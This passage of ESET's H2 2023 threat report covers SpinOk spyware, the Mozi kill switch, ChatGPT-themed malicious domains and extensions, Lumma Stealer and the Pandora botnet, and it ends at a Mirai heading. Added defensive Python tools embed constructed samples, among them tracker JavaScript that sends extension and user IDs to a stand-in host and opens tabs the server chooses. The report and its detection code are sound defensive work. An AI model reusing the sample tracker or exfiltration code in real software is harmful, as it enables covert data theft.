
Threat Report H2 2023
June 2023 – November 2023

(eset):research
ESET THREAT REPORT H2 2023 | 2

Contents
Foreword 4
Threat landscape trends 5
SpinOk spinning the definition of Android spyware 6
Who killed Mozi? 9
Abusing the ChatGPT name for malicious domains 12
Lumma Stealer takes the cryptostealer threat landscape by storm 14
Android TV boxes under fire: Pandora builds a botnet for DDoS attacks 16
Magecart, the ever-present phantom haunting e-commerce 18
Website visitors under siege by malicious scripts 21
Cl0p and its MOVEit hack: A mass-spreading yet targeted attack 23

Threat telemetry 26
Research publications 39
About this report 41
About ESET 42

Executive summary

Android
SpinOk spinning the definition of Android spyware
SDK or spyware? A significant number of legitimate Android apps started to behave as spyware; the reason is a third-party software development kit.

IoT, Botnets
Who killed Mozi?
ESET researchers discovered and analyzed a kill switch that had taken down one of the most prolific IoT botnets.

Web threats, AI
Abusing the ChatGPT name for malicious domains
A new economy has arisen around OpenAI API keys and the ChatGPT name, luring legitimate participants and cybercriminals alike.

Cryptocurrency threats, Infostealers, Malware-as-a-Service
Lumma Stealer takes the cryptostealer threat landscape by storm
Illicit cryptomining may be on its way out, but Lumma Stealer’s success shows that cryptowallets remain in the sights of cybercriminals.

IoT, Android, Botnets
Android TV boxes under fire: Pandora builds a botnet for DDoS attacks
A new Mirai-based threat uses malicious streaming apps to enslave devices in Latin America.

Infostealers, Web threats
Magecart, the ever-present phantom haunting e-commerce
It seems there is never a prolonged period without notable Magecart attacks and H2 2023 was no exception.

Web threats
Website visitors under siege by malicious scripts
The rise in JS/Agent detections reveals that almost 45,000 websites have fallen victim to malicious JavaScript code.

Ransomware
Cl0p and its MOVEit hack: A mass-spreading yet targeted attack
How exploitation of a two-year-old zero day by one actor caused a global cybersecurity nightmare.

Foreword
Welcome to the H2 2023 issue of the ESET Threat Report!

The second half of 2023 witnessed significant cybersecurity incidents. Cl0p, a notorious cybercriminal group known for carrying out ransomware attacks on a major scale, garnered attention through its extensive “MOVEit hack”, which surprisingly did not involve ransomware deployment. The attack targeted numerous organizations, including global corporations and US governmental agencies. A key shift in Cl0p’s strategy was its move to leak stolen information to open worldwide web sites in cases where the ransom was not paid, a trend also seen with the ALPHV ransomware gang. Other new strategies in the ransomware scene, according to the FBI, have included the simultaneous deployment of multiple ransomware variants and the use of wipers following data theft and encryption.

In the IoT landscape, our researchers have made a notable discovery. They have identified a kill switch that had been used to successfully render the Mozi IoT botnet nonfunctional. It is worth mentioning that the Mozi botnet is one of the largest of its kind we have monitored over the past three years. The nature of Mozi’s sudden downfall raises the question of whether the kill switch was used by the botnet creators or Chinese law enforcement. A new threat, Android/Pandora, surfaced in the same landscape, compromising Android devices – including smart TVs, TV boxes, and mobile devices – and utilizing them for DDoS attacks.

Amidst the prevalent discussion regarding AI-enabled attacks, we have identified specific campaigns targeting users of tools like ChatGPT. We also noticed a considerable number of attempts to access malicious domains with names resembling “chapgpt”, seemingly in reference to the ChatGPT chatbot. Threats encountered via these domains also include web apps that insecurely handle OpenAI API keys, emphasizing the importance of protecting the privacy of your OpenAI API keys.

We have also observed a significant increase in Android spyware cases, mainly attributed to the presence of the SpinOk spyware. This malicious software is distributed as a software development kit and is found within various legitimate Android applications. On a different front, one of the most recorded threats in H2 2023 is three-year-old malicious JavaScript code detected as JS/Agent, which continues to be loaded by compromised websites. Similarly, Magecart, a threat that goes after credit card data, has continued to grow for two years by targeting myriads of unpatched websites. In all three of these cases, the attacks could have been prevented if developers and admins had implemented appropriate security measures.

Lastly, the increasing value of bitcoin has not been accompanied by a corresponding increase in cryptocurrency threats, diverging from past trends. However, cryptostealers have seen a notable increase, caused by the rise of the malware-as-a-service (MaaS) infostealer Lumma Stealer, which targets cryptocurrency wallets. These developments show an ever-evolving cybersecurity landscape, with threat actors using a wide range of tactics.

I wish you an insightful read.

Jiří Kropáč
ESET Director of Threat Detection

Threat landscape trends

Android

SpinOk spinning the definition of Android spyware

SDK or spyware? A significant number of legitimate Android apps started to behave as spyware; the reason is a third-party software development kit.

During the second half of 2023, ESET telemetry reported a significant surge in Android Spyware detections, rising by 89%. This increase was primarily due to a mobile marketing software development kit (SDK), identified as SpinOk Spyware by ESET. Surprisingly, this SDK was incorporated into numerous legitimate Android applications, including many available on official app marketplaces. As a result, SpinOk Spyware climbed to seventh place in the Top 10 Android detections for H2 2023, becoming the most prevalent type of Spyware for the period – almost a third of all Spyware detections seen by ESET telemetry consisted of SpinOk.

Apps in which ESET and other cybersecurity vendors detect the SpinOk spyware contain a specific version of a mobile marketing SDK provided by a company named OKSpin. SDKs can be integrated into mobile apps to aid developers and marketers in collecting user data, analyzing user behavior, delivering personalized content, and executing other marketing strategies. In this instance, the OKSpin SDK offered app developers a gaming platform intended to monetize app traffic. Developers could embed it into a wide variety of apps and games, including those on official Android marketplaces. However, once an app with that OKSpin SDK is installed, it operates like spyware, connecting to a command-and-control server and extracting a range of data from the device, including potentially sensitive clipboard contents.

SpinOk also identifies emulated environments: it does so by analyzing data collected from the device’s gyroscope and magnetometer. If it determines that it is in a virtualized environment, it changes its behavior to avoid detection by sandboxes and researchers.

Android/SpinOK detection trend in H2 2023, seven-day moving average

Cybersecurity company Doctor Web identified 101 apps containing the SpinOk Spyware on Google Play, and although all of them were taken down from this platform, ESET telemetry continued to detect a significant number of such apps installed on Android devices worldwide. After Doctor Web’s findings were published, OKSpin updated its module.

The question remains, how did an SDK behaving as spyware find its way into so many apps, installed over 421 million times? Despite its significant presence in the mobile marketing sphere, OKSpin maintains a low-profile online presence. The company does not offer any contact details on its website, but we were able to find it registered in Hong Kong. Its given address is shared by a multitude of other companies, all claiming to occupy the same room within the same office building in Hong Kong. This suggests that OKSpin operates as a letterbox company and its address is used only for receiving mail and creating a semblance of physical presence in Hong Kong, while the actual business operations may be conducted elsewhere. Adding to the intrigue, in the Offshore Leaks report, which exposed international tax fraud, there is a company registered in a room adjacent to OKSpin’s claimed location.

Examples of various apps containing the SDK that behaves as spyware

A representative from an app that used the SDK provided by OKSpin shared their experience, shedding light on how the SDK found its way into numerous applications. According to the representative, their initial contact with OKSpin was through a business development agent who proposed a “revenue growth program”. The app developer confessed to failing to conduct thorough due diligence: they did not properly assess the third-party SDK before incorporating it into their app, which led to their legitimate app being removed from Google Play. Following the removal of the SDK, they then had to navigate a protracted process to have their app reinstated on the platform.

The case of SpinOk highlights a prevalent issue where a typical user downloading an app from an official store may not be able to discern whether the app contains malware or potentially unwanted elements. In such scenarios, a cybersecurity app is a valuable tool for detecting potential threats. Furthermore, this case serves as a cautionary tale for app developers, underscoring the risks associated with hasty and uninformed integration of third-party technology, which can disrupt their revenue stream and potentially lead to complications with their standing on official app stores.

The described surge of detections in the Spyware category, driven by SpinOk, stood out against the backdrop of a general decline in the detection of other Android threats, and is responsible for the overall rise of Android detections in H2 2023 by 22%. Adware, a constant threat in the Android environment, contributed to 36% of total detections in H2. This enduring prevalence of Adware can be traced to the pervasive use of free mobile games, which are often laden with intrusive ads. Clickers exhibited a significant upward trend, with an increase of 63% in detections. The rise in Clickers can also be linked to the growing distribution of apps loaded with ads, a strategy proving to be lucrative for cybercriminals. Nonetheless, HiddenApps remained the most widespread Android detection, even though there was a small decline of 3% in their detection rate. The only other category that recorded an increase in detections was Stalkerware, by 5%.

Adware, Clickers, and HiddenApps represent distinct Android detection types, each exploiting advertisements in unique ways. Adware primarily functions by displaying unsolicited ads on a user’s device. In contrast, HiddenApps cleverly conceal themselves on a device post installation and can execute various malicious – or at least unwanted – activities, including the display of intrusive ads. Clickers, on the other hand, are designed to fraudulently generate ad revenue through automated ad-clicking, unbeknownst to the user. This differentiation explains the distinction between Hiddad trojan and Hiddad PUA, both listed in the Top 10 Android detections in H2 2023. While Hiddad trojan falls under the HiddenApps category, Hiddad PUA is classified as a potentially unwanted application (PUA). Despite their similarities, these two detections exhibit slightly different behaviors on Android devices.

Financial threats, which encompass Banking malware and Cryptostealers, recorded a 14% decrease, thus continuing their downward trajectory from H1 2023. The second half of 2023 also saw a considerable decrease in detections of SMS threats (23%), Ransomware (22%), Cryptominers (10%), and ScamApps (9%).

EXPERT COMMENT

The SpinOk case serves as a reminder for app developers about the need for caution when deciding to incorporate third-party technology into their apps. It’s common for developers to be approached by third-party tech providers, but it’s crucial to evaluate these technologies thoroughly to ensure that they are secure and suitable for their apps.

Ensuring the security of an SDK involves a series of steps, starting with a comprehensive investigation of the provider’s reliability. This involves understanding the SDK’s functionality, examining its documentation, and, if feasible, scrutinizing the source code for any anomalies. Developers should utilize static analysis tools to unearth unwanted behavior and potential vulnerabilities, and keep an eye on network traffic to spot any unexpected data transfers. They can also scan their own apps with reputable security products after a test integration with the third-party SDK under consideration. It’s advantageous to verify whether the SDK or its provider has any security certifications or audits, and feedback from developer forums or groups should be considered. Prior to integrating an SDK into apps, we advise developers to conduct a test in a safe environment to assess its behavior and performance. Remember, integrating an SDK into your app gives it access to all of your app’s data, so if resources for such evaluations are lacking, it’s best to avoid using third-party SDKs.

Lukáš Štefanko, ESET Senior Malware Researcher
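One way to act on the advice above about watching network traffic after a test integration, as an added example that is not ESET's code nor any SDK vendor's: a small Python audit that replays a proxy capture from a test build, taken with a canary string placed on the clipboard, against the hosts the app and the SDK documentation declare. The capture, host names and canary value are constructed for illustration; it assumes the test ran on a physical device, since the text notes the SDK changes its behavior when it detects an emulator.

```python
"""Post-integration network audit for a third-party SDK (added example,
not code from the report). Assumes a test build ran on a physical device
with the clipboard seeded with a canary string, and that outbound HTTP
requests were recorded through a proxy as JSON Lines.
"""
import json
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Hosts the app itself talks to plus the hosts the SDK's documentation
# declares; anything else is an undeclared destination (constructed names).
ALLOWED_HOSTS = {
    "api.example-app.test",
    "telemetry.example-app.test",
    "cdn.ads-partner.test",   # documented by the (hypothetical) SDK vendor
}
# Constructed value placed on the clipboard before the test run.
CLIPBOARD_CANARY = "CANARY-7f3a-clipboard"
# Field names that hint at sensor data being collected (gyroscope,
# magnetometer, accelerometer), the kind of data used for emulator checks.
SENSOR_KEYS = ("gyro", "magnet", "accel")

# Constructed capture: one JSON object per outbound request. The third
# request is the kind of transfer the audit should surface: an undeclared
# host receiving the clipboard canary and gyroscope readings.
CAPTURE = """\
{"method": "GET", "url": "https://api.example-app.test/v1/feed", "body": ""}
{"method": "POST", "url": "https://cdn.ads-partner.test/impression", "body": "{\\"ad\\": 123}"}
{"method": "POST", "url": "https://192.0.2.10/collect", "body": "{\\"clip\\": \\"CANARY-7f3a-clipboard\\", \\"gyro\\": [0.01, 0.02, 9.8]}"}
{"method": "POST", "url": "https://telemetry.example-app.test/metrics", "body": "{\\"screen\\": \\"home\\"}"}
"""


@dataclass
class Finding:
    url: str
    reasons: list = field(default_factory=list)


def parse_capture(text: str) -> list:
    """Parse JSON Lines into request dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def audit_requests(requests, allowed_hosts, canary, sensor_keys=SENSOR_KEYS):
    """Return one Finding per request that needs a human look."""
    findings = []
    for req in requests:
        host = urlparse(req["url"]).hostname or ""
        body = req.get("body", "")
        reasons = []
        if host not in allowed_hosts:
            reasons.append(f"undeclared destination host: {host}")
        if canary and canary in body:
            reasons.append("clipboard canary found in request body")
        sensors = [k for k in sensor_keys if k in body.lower()]
        if sensors:
            reasons.append("sensor data in request body: " + ", ".join(sensors))
        if reasons:
            findings.append(Finding(req["url"], reasons))
    return findings


def undeclared_hosts(findings) -> set:
    """Hosts to raise with the SDK vendor before shipping the integration."""
    return {urlparse(f.url).hostname for f in findings
            if any(r.startswith("undeclared") for r in f.reasons)}


if __name__ == "__main__":
    for f in audit_requests(parse_capture(CAPTURE), ALLOWED_HOSTS, CLIPBOARD_CANARY):
        print(f.url)
        for r in f.reasons:
            print("  -", r)
```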

IoT, Botnets

Who killed Mozi?

ESET researchers discovered and analyzed a kill switch that had taken down one of the most prolific IoT botnets.

For over two years, we’ve been writing in ESET Threat Reports about the Mozi IoT botnet, reporting mostly on its gradual descent on autopilot. In August 2023, the botnet experienced an unanticipated nosedive in activity. First, it vanished from the radar in India (on August 8, 2023) and then a week later in China (August 16) – countries that hosted the lion’s share of the enslaved devices. Our deeper analysis showed that this was a deliberate takedown that could have been done by only two entities.

The originators of the Mozi botnet were apprehended by Chinese law enforcement in July 2021. Since then, the botnet continued exploiting vulnerabilities and infesting hundreds of thousands of new IoT devices each year but, unsurprisingly, there was no apparent use of the aggregated network and no updates to the Mozi bot code being propagated across it.

Mozi mostly compromises vulnerable Netgear DGN devices (EDB-25978), DASAN Networks GPON home routers (CVE-2018-10562), D-Link routers (CVE-2015-2051), and Jaws web servers (EDB-41471), but its spreading powers eroded over time. Between January and April 2022, the botnet added almost 500,000 new and unique minions, mostly from China and India. In the following four months that number already dropped to 383,000 and in the last third of 2022, it slid again to just 289,000 new bots.

This trend could theoretically continue until Mozi couldn’t find any more devices to compromise. But its downfall came much faster. In August 2023, Mozi bots unexpectedly stopped propagating and the number of unique IPs seen within our honeypots had nosedived by 89% within a few days.

Our investigation into the sudden collapse led us to the discovery of a control payload (a configuration file) that worked as a kill switch. Upon delivery, it stopped all attempts to propagate the malware further and stripped Mozi bots of most of their functionality.

Code snippets of the original Mozi sample (left) vs kill switch sample seen in 2023 (right)

Mozi timeline

ESET researchers first spotted the kill switch inside a user datagram protocol (UDP) message, which was missing the typical encapsulation of BitTorrent’s distributed sloppy hash table (BT-DHT) protocol. The person behind the takedown sent the control payload eight times to each available bot, always instructing the device to download and install an update of itself via HTTP.

The control payload also demonstrated several other functions such as killing the parent process and replacing the original Mozi file with itself, disabling system services such as sshd and Dropbear, executing router/device configuration commands and disabling access to a specific set of ports.

Despite the drastic reduction in functionality, Mozi bots have maintained persistence. They also pinged a remote server, probably for statistical purposes. Both these actions indicate that Mozi’s sudden demise was in fact a deliberate and calculated takedown. Upon closer inspection, the kill switch shows a strong connection to the botnet’s original source code and use of correct private keys to sign the binaries.

Based on these facts, we hypothesize about two potential actors, who could stand behind the castration of the botnet: the original botnet creators, or Chinese law enforcement forcing the cooperation of the creators.

The demise of one of the most prolific IoT botnets provided a wealth of cyberforensic and technical information on how such botnets are created, operated, and dismantled. In the coming months, ESET researchers will publish a detailed analysis on WeLiveSecurity.com.

EXPERT COMMENT

In recent years, IoT malware has slipped to the periphery of concern given its difficult detection, monitoring, and often unattainable mitigation. Still, threats like Mirai and its offspring represent a significant risk, as smart devices can easily be exploited to create large DDoS networks, anonymization networks, or be used for targeted tracking of VIP users.

Adequate security measures and standards for IoT protection are available, but not all manufacturers are willing to implement them – be the reason the costs, negligence, or anything else. Also, one cannot expect end users to be the force of change, because they are mostly indifferent to whether their router or security camera recorder is conducting some illicit activity, since it doesn't affect their experience.

Meanwhile, attackers keep pace with vulnerabilities, exploiting an ever-growing number of weaknesses and types of devices and all that with alarming proficiency. The significance of honeypots in monitoring such actions is therefore crucial, having been instrumental in observing occurrences like the shutdown of Mozi. Ultimately, understanding and addressing these and all the emerging potential cyberthreats will be critical to help increase the digital security of the future internet.

Milan Fránik, ESET malware researcher

Sudden drop in Mozi activity globally in H2 2023, seven-day moving average
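The kill switch was first noticed as a UDP message lacking the BT-DHT encapsulation that Mozi traffic normally carries. As an added example that is not ESET's code, the Python below does the honeypot-side check that makes such outliers visible: it attempts to decode each datagram as a bencoded KRPC message (the envelope the DHT uses) and reports the ones that do not fit. The sample datagrams are constructed and carry no real Mozi payload.

```python
"""Classify UDP datagrams arriving on a BT-DHT honeypot port (added example,
not ESET's code). Mozi bots talk over BitTorrent's DHT, whose KRPC messages
are bencoded dictionaries; a datagram that does not decode as one is the
kind of outlier that led to the discovery of the kill switch.
"""


def bdecode(data: bytes):
    """Decode one bencoded value; return (value, bytes_consumed).
    Raises ValueError on malformed or truncated input."""
    def parse(i):
        c = data[i:i + 1]
        if c == b"i":                       # integer: i<digits>e
            end = data.index(b"e", i)
            return int(data[i + 1:end]), end + 1
        if c == b"l":                       # list: l<items>e
            items, i = [], i + 1
            while data[i:i + 1] != b"e":
                v, i = parse(i)
                items.append(v)
            return items, i + 1
        if c == b"d":                       # dict: d<key><value>...e
            d, i = {}, i + 1
            while data[i:i + 1] != b"e":
                k, i = parse(i)
                v, i = parse(i)
                d[k] = v
            return d, i + 1
        if c.isdigit():                     # byte string: <len>:<bytes>
            colon = data.index(b":", i)
            n, start = int(data[i:colon]), colon + 1
            if start + n > len(data):
                raise ValueError("truncated string")
            return data[start:start + n], start + n
        raise ValueError(f"bad bencode at offset {i}")
    return parse(0)


def classify_datagram(payload: bytes) -> str:
    """'krpc' for a well-formed DHT message, otherwise 'non-dht'."""
    try:
        msg, used = bdecode(payload)
    except ValueError:
        return "non-dht"
    if used != len(payload) or not isinstance(msg, dict):
        return "non-dht"
    # Every KRPC message carries a transaction id 't' and a message type 'y'
    # that is a query, a response or an error.
    if b"t" not in msg or msg.get(b"y") not in (b"q", b"r", b"e"):
        return "non-dht"
    return "krpc"


def triage(datagrams):
    """Summarise a batch and return the outliers an analyst should inspect."""
    outliers = [d for d in datagrams if classify_datagram(d) == "non-dht"]
    summary = {"total": len(datagrams),
               "krpc": len(datagrams) - len(outliers),
               "non-dht": len(outliers)}
    return summary, outliers


# Constructed samples: a DHT ping query, a ping response, a datagram with no
# bencode envelope at all, and one that is bencoded but has trailing bytes.
SAMPLES = [
    b"d1:ad2:id20:" + b"A" * 20 + b"e1:q4:ping1:t2:aa1:y1:qe",
    b"d1:rd2:id20:" + b"B" * 20 + b"e1:t2:aa1:y1:re",
    b"\x00\x01update:http://example.invalid/placeholder",
    b"d1:t2:aa1:y1:qe" + b"extra",
]

if __name__ == "__main__":
    summary, outliers = triage(SAMPLES)
    print(summary)
    for o in outliers:
        print("inspect:", o[:40])
```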



Web threats, AI

Abusing the ChatGPT name for malicious domains

A new economy has arisen around OpenAI API keys and the ChatGPT name, luring legitimate participants and cybercriminals alike.

ESET telemetry in H2 2023 recorded blocking over 650,000 attempts to access malicious domains whose names include the string chapgpt or similar text in apparent reference to the ChatGPT chatbot. While most blocks happened in June, the succeeding months saw website visitors encountering a steady stream of malicious domains superficially offering OpenAI services.

Threats encountered via these domains include web apps that insecurely handle OpenAI API keys, and malicious Google Chrome browser extensions for ChatGPT.

OpenAI offers an API that grants access to AI models trained by OpenAI, such as GPT, DALL·E, and Whisper. Using the API requires obtaining a key from OpenAI and sending it in an HTTP Authorization header to an api.openai.com endpoint. OpenAI then bills each API key user according to the number of tokens used. Protecting the privacy of your API key is thus critical to ensuring that your API use stays within budget. However, some developers have built bring-your-own-key apps that request your OpenAI API key, purportedly to make calls to api.openai.com on your behalf. If the app sends your key to the developer’s server, there may be little to no guarantee that your key will not be leaked or misused, even if the call to the OpenAI API is also made. This is why OpenAI strongly exhorts: “Remember that your API key is a secret! Do not share it with others or expose it in any client-side code (browsers, apps).”

In one case, we noticed that a ChatGPT web app on chat.apple000[.]top asks users for their OpenAI API keys and sends them to its own server.

Detections of malicious ChatGPT-inspired domain names and JS/Chromex.Agent.BZ in H2 2023

This web app links to the open-source code in GitHub from which it was built. A Censys query for HTML web pages that use the title “ChatGPT Next Web” suggests that over 7,000 servers host a copy of this web app. Whether these copies were created as a part of campaigns phishing for OpenAI API keys or were exposed on the internet for another reason cannot be determined with certainty; however, we strongly discourage entering your OpenAI API key into any app that sends it to an untrusted server.

A ChatGPT web app that sends OpenAI API keys to its own server

Apart from such web apps, almost all blocks of malicious ChatGPT-inspired domain names in the second half of 2023 were related to Chrome extensions detected as JS/Chromex.Agent.BZ – a detection first seen in June.

For example, we saw gptforchrome[.]com leading to the malicious extension ChatGPT for Search - Support GPT-4 in the Chrome Web Store, which we have reported to Google. In June, a developer also reported that this extension was potentially malicious.

ChatGPT for Search Chrome browser extension detected as JS/Chromex.Agent.BZ

This Chrome extension uses an extension service worker to import JavaScript from a file called tracker.js, which periodically sends the following information to the gptforchrome[.]com server:

• extension ID,
• extension version,
• unique user ID assigned by the extension, and
• current timestamp.

If the server sends a URL in response, the extension can display it in a new browser tab. This functionality, undisclosed by the developer, could be a conduit to malicious web pages.

EXPERT COMMENT

Deleting malicious browser extensions may not be enough to prevent attempts at re-compromise if you have turned on sync in your browser. Whenever the sync process runs, it attempts to make browser data – such as extensions – from other devices available in the browser on your current device. Make sure to delete malicious browser extensions on all your devices, especially if you have enabled sync. Even better is to carefully vet browser extensions before installing them and to use a reliable, multilayered security solution that can detect them.

Jiří Kropáč, ESET Director of Threat Detection
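The two behaviours described above, a service worker pulling in a tracker script that reports to a remote server and a server-supplied URL being opened in a new tab, can both be surfaced by static review before an extension is installed. The Python below is an added example, not ESET's code nor the extension's: it follows the manifest to the service worker, collects the files it imports, lists the remote hosts named in URL literals, and flags chrome.tabs.create calls whose URL is not a string literal. The extension files and host names are constructed placeholders.

```python
"""Static triage of an unpacked Chrome extension (added example, not ESET's
code). Walks manifest -> service worker -> importScripts() targets, then
reports remote hosts from URL literals and chrome.tabs.create calls whose
URL is computed at runtime. The extension contents below are constructed.
"""
import json
import re
from urllib.parse import urlparse

# Constructed unpacked extension: path -> file contents.
EXTENSION_FILES = {
    "manifest.json": json.dumps({
        "manifest_version": 3,
        "name": "Example Search Helper",
        "version": "1.2.3",
        "background": {"service_worker": "background.js"},
    }),
    "background.js": (
        "importScripts('tracker.js');\n"
        "chrome.runtime.onInstalled.addListener(() => setup());\n"
    ),
    "tracker.js": (
        "const REPORT = 'https://collector.example.invalid/ping';\n"
        "setInterval(async () => {\n"
        "  const body = JSON.stringify({id: chrome.runtime.id,\n"
        "    v: chrome.runtime.getManifest().version, uid: await getUid(), ts: Date.now()});\n"
        "  const r = await fetch(REPORT, {method: 'POST', body});\n"
        "  const data = await r.json();\n"
        "  if (data.url) chrome.tabs.create({url: data.url});\n"
        "}, 600000);\n"
    ),
}

IMPORT_RE = re.compile(r"importScripts\(\s*['\"]([^'\"]+)['\"]")
URL_LITERAL_RE = re.compile(r"['\"](https?://[^'\"]+)['\"]")
TABS_CREATE_RE = re.compile(r"chrome\.tabs\.create\(\s*\{[^}]*url\s*:\s*([^,}]+)")


def load_worker_sources(files: dict) -> dict:
    """Return {path: source} for the service worker and everything it imports."""
    manifest = json.loads(files["manifest.json"])
    entry = manifest.get("background", {}).get("service_worker")
    if not entry:
        return {}
    sources, queue = {}, [entry]
    while queue:
        path = queue.pop()
        if path in sources or path not in files:
            continue
        sources[path] = files[path]
        queue.extend(IMPORT_RE.findall(files[path]))
    return sources


def audit_extension(files: dict) -> dict:
    """Summarise what the background code reaches out to and how it opens tabs."""
    sources = load_worker_sources(files)
    contacted, dynamic_tabs = {}, []
    for path, src in sources.items():
        for url in URL_LITERAL_RE.findall(src):
            contacted.setdefault(urlparse(url).hostname, set()).add(path)
        for m in TABS_CREATE_RE.finditer(src):
            arg = m.group(1).strip()
            # A quoted literal is a fixed page; anything else is chosen at
            # runtime, e.g. from a server response.
            if not arg.startswith(("'", '"', "`")):
                dynamic_tabs.append((path, arg))
    return {
        "worker_files": sorted(sources),
        "contacted_hosts": {h: sorted(p) for h, p in contacted.items()},
        "dynamic_tab_urls": dynamic_tabs,
    }


if __name__ == "__main__":
    print(json.dumps(audit_extension(EXTENSION_FILES), indent=2))
```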

Cryptocurrency threats, Infostealers, Malware-as-a-service

Lumma Stealer takes the cryptostealer threat landscape by storm

Illicit cryptomining may be on its way out, but Lumma Stealer’s success shows that cryptowallets remain in the sights of cybercriminals.

Top 10 cryptostealer families in H2 2023 (% of Cryptostealer detections)
Win/Spy.Agent trojan 78.9%
Win/PSW.Delf trojan 8.0%
MSIL/ClipBanker trojan 6.8%
Win/PSW.Agent trojan 3.7%
MSIL/PSW.CoinStealer trojan 2.1%
PowerShell/PSW.CoinStealer trojan 0.4%
Python/PSW.CoinStealer trojan 0.1%
JS/CoinThief trojan 0.02%
Win/Spy.CoinBit trojan 0.02%
JS/ExtenBro.CryptoSteal trojan 0.01%

H2 2023 continued the phenomenon described in the previous Threat Report: the exchange rate of bitcoin kept going up, yet cryptocurrency threats failed to match this trend. However, while cryptominers – which make up the majority of cryptocurrency threats detected by ESET – experienced yet another steep decline (down by 21%), cryptostealers were on the rise. In H2 2023, these threats grew by more than 68%. Thankfully, we cannot speak of a cryptostealing renaissance just yet, as this sudden increase was caused by just one specific threat, which accounted for almost 80% of detections in this category – the Win/Spy.Agent.PRG trojan.

By matching the samples registered in ESET telemetry data and the samples found on VirusTotal, we determined that Win/Spy.Agent.PRG is a malware-as-a-service (MaaS) infostealer called Lumma Stealer. Also known as LummaC2 Stealer, this malware is written in C and targets cryptocurrency wallets, user credentials, and two-factor authentication browser extensions. It also exfiltrates information from compromised machines. Between H1 and H2 2023, the number of Lumma Stealer detections tripled. We registered the highest rate of Win/Spy.Agent.PRG detections in the latter half of H2, peaking in October.

Lumma Stealer detection trend in H1 and H2 2023, seven-day moving average (H1 to H2: +199%)

This up-and-coming MaaS first appeared in the wild in August 2022 and is available for sale on underground forums and on Telegram. Multiple tiers are offered, with prices ranging from USD 250 up to USD 20,000; the highest tier even gives buyers access to the infostealer’s source code and allows them to sell the malware themselves.

Interestingly, there are ESET detections of Win/Spy.Agent.PRG from before 2022. Based on the information shared on X (formerly Twitter) by the cybersecurity company Sekoia.io and the user Fumik0_, we conclude that the detections prior to 2022 belong to Mars, Arkei, and Vidar infostealers, whose common code base was later repurposed to create Lumma Stealer.

Being available for sale and not focusing purely on cryptostealing are very likely the main factors behind Lumma Stealer’s popularity among cybercriminals. As we discussed in the RedLine Stealer section of the H1 2023 ESET Threat Report, ready-made malware solutions contribute to the proliferation of malicious campaigns because they make the malware available even to potentially less technically skilled threat actors. Offering a broader range of functions then serves to render Lumma Stealer even more attractive as a product.

Although this infostealer spreads mainly through cracked installations of software such as VLC and ChatGPT, it has been seen utilizing other distribution vectors as well. For example, in February 2023, a Korean YouTuber was targeted via a spearphishing email impersonating the video game company Bandai Namco. Threat actors have also been spreading it via the content delivery network of the popular chat platform Discord. Furthermore, Lumma Stealer is one of the possible payloads of a recent fake browser update campaign, in which a compromised website is made to display an overlay telling the victim that a browser update is necessary to access the site. Clicking the update button then delivers malware such as RedLine, Amadey, or the titular Lumma Stealer to the victim’s machine.

At ESET, we have also seen Lumma Stealer being distributed by the Win/TrojanDownloader.Rugmi trojan. This malware is a loader with three types of components: a downloader that downloads an encrypted payload, a loader that runs the payload from internal resources, and another loader that runs the payload from an external file on the disk. Apart from Lumma Stealer, Win/TrojanDownloader.Rugmi is also used to deliver other infostealers, among them Vidar, Rescoms, and RecordBreaker. The detections of this loader skyrocketed in H2, going from single digit daily numbers to hundreds per day.

Win/TrojanDownloader.Rugmi detection trend in H2 2023, seven-day moving average

CRYPTOCURRENCY HEISTS AND SCAMS

Malware that targets cryptocurrencies may not be as common as before, but H2 2023 saw no lack of high-profile cryptocurrency-related cybercrime.

Cryptoscammers posing as NFT developers
The FBI issued a warning about criminals posing as legitimate NFT developers in order to steal the cryptocurrency funds of their victims. These scammers make posts claiming to offer limited NFT opportunities that lead to spoofed websites. Once victims try to make purchases via the website, the threat actors can steal the funds contained within their cryptocurrency wallets.

Lazarus linked to theft of roughly USD 900 million in cryptocurrency
Between July 2022 and July 2023, the Lazarus APT group laundered around USD 900 million in cryptocurrency through cross-chain crime: when criminals convert cryptocurrency assets from one token or blockchain to another, often in quick succession, to obfuscate the assets’ origin.

Elon Musk cryptocurrency scams find a new platform
Scams posing as cryptocurrency giveaways by Elon Musk have for some time been quite notorious on X and Instagram. Now, they are finding a new audience on the video-sharing platform TikTok, using deep fakes of Musk interviews. In order to receive the advertised reward, users are asked to make activation deposits into scam sites, which then steal the payments.

USD 4.4 million in cryptocurrency stolen due to LastPass breach
In October, hackers used private keys and passphrases from leaked LastPass databases to steal USD 4.4 million in cryptocurrency. LastPass was breached twice in 2022, giving threat actors access to the company’s customer data.

IoT Android Botnets

Android TV boxes under fire: Pandora builds a botnet for DDoS attacks
A new Mirai-based threat uses malicious streaming apps to enslave devices in Latin America.

Any device connected to the internet could become a target for cybercriminals. Smart TVs with their peripherals are no exception. In September 2023, a new IoT botnet sprang to life, which ESET detects as Android/Pandora. First described by Doctor Web, the threat compromises Android devices – most prominently Android TV boxes – with Mirai-based malware. The enslaved devices are then used by the botnet operators to run DDoS attacks.

According to ESET telemetry, Android/Pandora attempted to compromise tens of thousands of Android devices, with approximately a fifth of instances detected and blocked directly on victims' television sets by ESET Smart TV Security.

The biggest spike of activity was observed on September 8, with over two thousand attacks. After the initial wave, the activity dropped to about five hundred attacks daily. The most targeted region is Latin America, with Brazil leading the pack (20%), followed by Mexico (13%) and Peru (11%).

There are two possible delivery methods for the Android/Pandora malware. First is via malicious firmware updates that were preinstalled on the Android TV box by the reseller or downloaded and installed by an unaware victim.

However, the main distribution channel seems to be websites spreading malicious apps with names such as MagisTV, Tele Latino, and YouCine. These are offered not only for TVs, smartphones, tablets and Android TV boxes, but also for TV sticks from Amazon and Xiaomi.

Upon installation, these apps offer streaming services and pirated content that can be accessed for free, on trial, or with a premium account. From the user's perspective, the app provides all the promised features and content without any obvious signs of malicious activity. Moreover, paying for the premium subscription lowers the willingness of a victim to voluntarily remove the malware from the device.

[Chart: Android/Pandora detection trend from September 2023 to November 2023]

ANDROID TV BOX
It's an IoT peripheral device – typically a box or a dongle – that users plug into their TV to gain access to a variety of streaming apps, or content, that is not natively supported by their television set.

Although the list of app permissions doesn't seem to be intrusive or to hint at spyware functionality, if installed on a Smart TV, Pandora requests superuser or root rights for the application. For this to work, however, the device already needs to be rooted at the point of installation; the app does not try to root the device itself.

[Figure: User interface of the malicious apps]
[Figure: Pandora request for superuser (root) rights on an Android Smart TV]

(Other) Mirai-based botnets

